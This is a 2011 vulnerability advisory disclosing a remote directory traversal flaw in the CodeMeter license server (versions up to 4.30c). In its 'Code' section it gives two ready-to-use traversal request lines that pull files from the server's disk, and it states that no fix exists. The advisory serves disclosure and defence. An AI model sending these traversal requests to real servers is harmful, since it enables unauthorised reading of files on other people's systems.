####################################################################### Luigi Auriemma Application: CodeMeter http://www.wibu.com/codemeter.html http://codemeter.com Versions: <= 4.30c (4.30.485.503) Platforms: Windows, Mac OSX, Linux Bug: limited directory traversal Exploitation: remote Date: 02 Sep 2011 Author: Luigi Auriemma e-mail: aluigi@autistici.org web: aluigi.org ####################################################################### 1) Introduction 2) Bug 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== CodeMeter is a dongle-based licensing software. ####################################################################### ====== 2) Bug ====== The license server listening on port 22350 is affected by a limited directory traversal vulnerability exploitable through a virtual directory, allowing an an attacker to download some of the files located in the disk where it's installed. The virtual directories start with the '$' char (like the $help one) and doesn't matter if they exist or not to exploit the bug. The limitation of the attack is caused by a list of allowed extensions like txt, htm, html, images and so on. At the moment I have found no way to bypass this limit. ####################################################################### =========== 3) The Code =========== http://aluigi.org/mytoolz/mydown.zip mydown http://SERVER:22350/$help/../../../../../../file.txt mydown http://SERVER:22350/$blah/..\..\..\..\..\..\file.txt ####################################################################### ====== 4) Fix ====== No fix. #######################################################################